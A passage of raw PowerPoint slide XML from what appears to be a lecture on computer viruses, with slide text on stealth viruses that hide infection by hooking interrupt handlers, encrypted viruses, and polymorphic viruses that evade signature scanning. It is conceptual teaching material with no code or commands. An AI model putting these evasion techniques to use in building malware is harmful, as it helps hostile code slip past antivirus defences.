                      <a:endParaRPr sz="28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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Othe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r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 par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t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 executabl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e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infector</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>20</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Stealth </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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iruses</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-17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virus that conceals</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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infection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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of files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750"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="15"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="750"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="928370" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Example:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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IDF virus modifies a service interrupt handler as follows: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295"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Request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for file length: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return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length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of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-1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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>uninfected</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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1278890">
                        <a:lnSpc>
                          <a:spcPts val="3025"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>file</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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</a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="577215" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="3020"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Request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to open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file:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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temporarily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disinfect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file,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and re-infect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on closing;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defeats</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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virus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scanners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that open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and read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files.</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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5"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="1060450" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="3020"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Reques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t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t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o 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loa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d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fil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e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f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o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r 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execution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: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l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oa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d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infected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file</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>21</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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57705" y="4774691"/>
            <a:ext cx="1790700" cy="693420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1790700" h="693420">
                <a:moveTo>
                  <a:pt x="1790700" y="693420"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1790700" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1790700" y="693420"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19253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068567" y="4765547"/>
            <a:ext cx="2252472" cy="6934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321040" y="4765547"/>
            <a:ext cx="211835" cy="69342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148066" y="5516117"/>
            <a:ext cx="249935" cy="134874"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249935" h="134874">
                <a:moveTo>
                  <a:pt x="38100" y="77724"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="19812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249936" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="134874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="77724"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19253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148066" y="5516117"/>
            <a:ext cx="249935" cy="134874"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249935" h="134874">
                <a:moveTo>
                  <a:pt x="249936" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="19812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="77724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="134874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24993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090154" y="5593841"/>
            <a:ext cx="76961" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="76961" h="38100">
                <a:moveTo>
                  <a:pt x="76961" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="38100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19253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066573" y="5053753"/>
            <a:ext cx="75658" cy="75078"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="75658" h="75078">
                <a:moveTo>
                  <a:pt x="75658" y="37930"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="73023" y="24080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65759" y="12383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54822" y="3977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41171" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26021" y="2392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13618" y="9136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4699" y="19239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2026" y="47690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8201" y="60578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17617" y="69874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29366" y="75078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46221" y="73382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59487" y="67664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68943" y="58778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74367" y="47579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75658" y="3793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104894" y="4996434"/>
            <a:ext cx="173736" cy="192786"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="173736" h="192786">
                <a:moveTo>
                  <a:pt x="0" y="96012"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173736" y="96012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96012"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19253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104894" y="4996434"/>
            <a:ext cx="173736" cy="192786"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="173736" h="192786">
                <a:moveTo>
                  <a:pt x="173736" y="96012"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173736" y="9601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412235" y="5054346"/>
            <a:ext cx="0" cy="76962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76962"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3937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431285" y="5054346"/>
            <a:ext cx="712470" cy="76962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="712470" h="76962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712470" y="76962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71247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14" name="object 14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1703">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="291528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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Encrypted </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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iruses</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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00600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="1106805" marR="1971675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1106170" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-15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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>virus that is enciphered except for a small deciphering routine</a:t>
                      </a:r>
                      <a:endParaRPr sz="2700" dirty="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10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1678305" marR="790575" lvl="1" indent="-4572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1677670" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2300" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Detecting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="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300" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>virus by signature is now much harder as most of virus is enciphered</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" dirty="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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1678305" lvl="1" indent="-4572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1677670" algn="l"/>
                          <a:tab pos="6504940" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2300" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>The key does not need to be kept secret.	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>hy?</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" dirty="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10"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="55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 marL="1363345">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" spc="-254" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>V</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>irus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="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1800" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>code</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" dirty="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200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="45"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="6022340">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Deciphering</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="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1800" spc="95" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>k</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-204" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>22</a:t>
                      </a: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5" name="object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2153578"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4528083" y="4765064"/>
          <a:ext cx="4004308" cy="70397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400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52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18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03973">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="404495" marR="222885" indent="-250190">
                        <a:lnSpc>
                          <a:spcPct val="70000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Deciphering routine</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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9253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1925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6520">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Enciphered</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="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1800" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>virus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="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1800" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>code</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" dirty="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9253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1925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800" dirty="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9253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="19253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69684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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Polymorphic</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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iruses</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1120775" marR="1375410" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="2920"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1120775" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-15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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>virus that changes its form each time it inserts itself into another program</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1120775" marR="966470" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="2920"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1120775" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Idea is to prevent signature detection by changing the “signature” or instructions used for deciphering routine</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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1120775" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="280"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1120775" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>At instruction level: substitute instructions.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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40"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1120775" marR="1086485" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="2920"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1120775" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>At algorithm level: di</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-50" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ferent algorithms to achieve the same purpose</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1120775" marR="1570355" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="2920"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1120775" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" spc="-190" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>oolkits exist to make these (Mutation Engine, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-100" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>rident Polymorphic Engine)</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>23</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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R="0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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Example</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1449705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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>These are di</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-50" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ferent instructions (with di</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-50" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ferent bit patterns) but have the same e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-50" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
